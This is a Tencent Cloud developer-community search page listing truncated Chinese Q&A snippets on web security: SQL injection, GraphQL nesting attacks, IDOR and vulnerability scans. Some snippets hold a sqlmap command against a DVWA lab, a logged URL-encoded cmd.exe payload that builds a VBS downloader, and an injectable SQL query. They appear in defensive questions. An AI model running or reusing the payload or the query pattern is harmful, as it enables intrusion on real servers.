腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
如何使Sqlmap获得数据库的管理员权限?
、
、
我正在使用sqlmap来利用DVWA项目中的数据库。sqlmap -u "http://192.168.71.130/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#" -p id --cookie="security=low; PHPSESSID=kikm4b9s9tdk5kq21cs20jt9j1;" --current-usersqlmap -u "http://192.168.7
浏览 0
提问于2018-04-11
得票数 0
回答已采纳
1
回答
如何保护MySQL数据库不受sql注入的影响?
、
我读过sql注入
漏洞
可能非常危险,因为
服务器
可能泄露用户密码和信用卡信息。SELECT * FROM users WHERE name = '" + userName + "';
浏览 0
提问于2012-09-26
得票数 0
5
回答
如何防止对GraphQL/阿波罗
服务器
的嵌套攻击?
、
、
如何防止使用以下
查询
对阿波罗
服务器
进行嵌套攻击: authors { posts { author { [n post] } } }换句话说,如何限制在
查询
中提交的递归的数量这可能是一个潜在的
服务器
漏洞
。
浏览 13
提问于2016-05-20
得票数 64
回答已采纳
1
回答
url中的aspxerrorpath=/导致自定义错误页无法工作
、
如果你访问(虚拟ip):http:someipaddress/ZNYTMHXO.ashx但是,如果您使用相同的url,但在
查询
字符串中使用aspxerrorpath=/pci扫描失败。抱歉,我应该声明ZNYTMHXO.ashx并不存在。404重定向在
查询
字符串中不存在asperrorpath时有效。 -UPDATE-只是为了说明一下,这是显示
浏览 0
提问于2013-04-12
得票数 1
回答已采纳
1
回答
如何
查询
嵌套列表中的项?
它也有缺点,特别是: { "type": 1 ]我遇到的问题是,我仍然从根本上
查询
漏洞
,并且不知道如何在
查询
中“引爆”
漏洞
。具体来说(我相信我的问题会被这个系
浏览 3
提问于2017-08-01
得票数 0
回答已采纳
1
回答
URL参数操作和注入
、
、
、
、
如果
查询
字符串上存在参数"p“,则在我的主页上指向Site 2的所有URL上进行替换,现在传递通过
查询
字符串传入的值,如下所示:至p=value">Link </a>mysite.com?p=123 我不处理
查询
字符串,我只需要得到p的值并使用该参数生成第二个url
浏览 0
提问于2019-12-04
得票数 4
回答已采纳
2
回答
日志中的可疑http请求
、
我在我的Ubuntu14.04 apache2 access.log中找到了这个请求: xxx.228.207.244 - - [25/Sep/2014:17:52:03 -0400] "GET /?search==%00{.exec|cmd.exe+%2Fc+echo%3E22222.vbs+dim+wait%2Cquit%2Cout%3ASet+xml%3DCreateObject%28%22Microsoft.XMLHTTP%22%29%3ASet+WshShell+%3D+Wscript.CreateObject%28%22WScript.Shell%22%29+%3ADS%3
浏览 0
提问于2014-09-26
得票数 2
回答已采纳
1
回答
GlassFish目录泄漏
漏洞
、
、
我有一个Glassfish 4.1.1
服务器
,有一个用MCafee
漏洞
管理器进行的
漏洞
扫描,发现
服务器
在管理
服务器
(端口4848)上有泄漏
漏洞
FID 10109 (端口4848)我搜索并且只找到目录横向
漏洞
的解决方案,有谁解决了这个
漏洞
?
浏览 8
提问于2017-03-15
得票数 2
回答已采纳
1
回答
在拒绝意外的HTTP请求参数redux时,我应该有多严格?
、
、
我读过这个:在拒绝意外
查询
参数时,我应该有多严格?但我刚接到保安人员的要求我必须这么做。不仅用于意外
查询
字符串,而且也适用于意外的cookie、标头和意外的所有内容。推理: 技术堆栈中的某些组件可能存在缓冲区溢出、sql注入或其他此类
漏洞
等
漏洞
。请求中的意外数据可能是恶意尝试查找和利用此类
漏洞
。因此,在这种情况下,需要返回4xx响应。黑匣子应该被配置为检测4xx响应的尖峰,并做出适当的反应:禁止产生此类响应的ip,通知管理员
服务器</
浏览 0
提问于2021-06-10
得票数 0
回答已采纳
3
回答
对于面向Java的web
服务器
来说,什么是安全的选择?
、
、
我需要实现一个
服务器
,可以通过互联网公开访问。
服务器
有一个非常简单的任务:
服务器
通常受到的负载是最小的,但是由于没有访问限制,
服务器
显然可以受到DOS等的攻击一个
浏览 7
提问于2011-03-17
得票数 7
回答已采纳
1
回答
如何从火基而不是从Android进行地火
查询
?
、
、
、
我试图
查询
位置db,geofire,但不希望从客户端完全打开
查询
。还有其他保护
查询
数据的办法吗?谢谢。
浏览 3
提问于2022-02-25
得票数 0
2
回答
ASP.NET MVC中的
漏洞
测试
、
、
从单元测试的角度看 :是否有任何(更喜欢开源的)工具来测试建立在ASP.NET MVC、手动或自动基础上的网站的
漏洞
,这些
漏洞
可以用于质量保证?
浏览 4
提问于2013-05-12
得票数 9
1
回答
修复“类别参数中的跨站点脚本
漏洞
”
漏洞
?
、
、
、
例如,下面是我们标记的一条隐秘的失败消息:但是没有关于如何关闭该
漏洞
的明确指导。 谢谢。
浏览 0
提问于2011-05-27
得票数 2
回答已采纳
1
回答
我一直在我的apache日志中看到+--+,这是什么?
、
我正在查看我的apache
服务器
日志,当有人扫描
服务器
上的
漏洞
时,我总是在他们的
查询
字符串中看到这一点……就像下面的例子一样…….我正在考虑使用它作为我可以过滤fail2ban的东西
浏览 4
提问于2013-06-07
得票数 5
1
回答
IDOR (不安全的直接对象引用)是
服务器
端或客户端的
漏洞
吗?
、
我想知道IDOR是客户端
漏洞
还是
服务器
端
漏洞
。在我看来,这是
服务器
端的
漏洞
。
浏览 0
提问于2019-07-31
得票数 -2
2
回答
我的网站登录脚本和安全问题在哪里?
、
我有下面的登录脚本,我已经尽力让它安全,但是有一个人黑了我的脚本,给我发了一封他能够登录的电子邮件,他还给我发送了我的数据库信息,比如管理密码等等。<?include("../global.inc.php"); { $objAdmin = new admin(); $verifyAdmin=$objAdmin->
浏览 7
提问于2012-11-11
得票数 0
2
回答
mongodb注入可能性
、
、
、
我是mongodb的新手,我在
服务器
端(节点js)使用这个
查询
, collection.col.aggregate(我想知道这种方法是否会导致像sql注入这样的安全
漏洞
。如果是,
漏洞
有多严重?攻击者是否有可能执行除只读操作之外的其他操作? 谢谢你提前..。
浏览 3
提问于2015-01-02
得票数 1
回答已采纳
2
回答
CVE的
漏洞
测试-2014-2483?
、
、
、
我正在使用Linux 6/7操作系统在
服务器
上进行渗透测试。http://www.cvedetails.com/等
漏洞
数据库提到了Linux系统中JavaCVE-2014-2483的
漏洞
。我寻找方法,可以测试我的目的地的
漏洞
,但我没有找到任何东西。 如何测试
服务器
是否存在此
漏洞
?
浏览 0
提问于2015-05-10
得票数 2
1
回答
授权代码与访问令牌有何不同?
在OAuth 2.0流中,授权
服务器
将授权代码发送到重定向端点,然后网页必须再次访问
服务器
才能获得单独的访问令牌来
查询
受保护的API。有一个帖子,但它并没有真正地解释背后的设计理由。
浏览 3
提问于2017-10-03
得票数 4
回答已采纳
1
回答
MYSQL
查询
在Node.JS中正确时给我语法错误吗?
、
我编写了一个大型
查询
,并在我的sql程序中进行了测试,成功地插入了一行。在Node中,我基本上把这个
查询
转换成一个字符串并运行它,这样我就可以从我的
服务器
插入数据。86400; SET @UNIX_WEEK = 604800; SET @INITIAL_TRANSACTION_TIME = 14' at line 1] code: 1064 } 我输入的这个
查询
字符串已确认工作正常,但当我在Node中执行
查询
时,我会得到一个语法错误。
浏览 1
提问于2016-05-30
得票数 0
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
漏洞查询站点列表
服务器解析漏洞
如何防范租用服务器漏洞?
如何查询经纪商服务器地址
查询人数太多服务器都崩溃?附详细查询教程
热门
标签
更多标签
云服务器
ICP备案
云直播
对象存储
腾讯会议
活动推荐
运营活动
广告
关闭
领券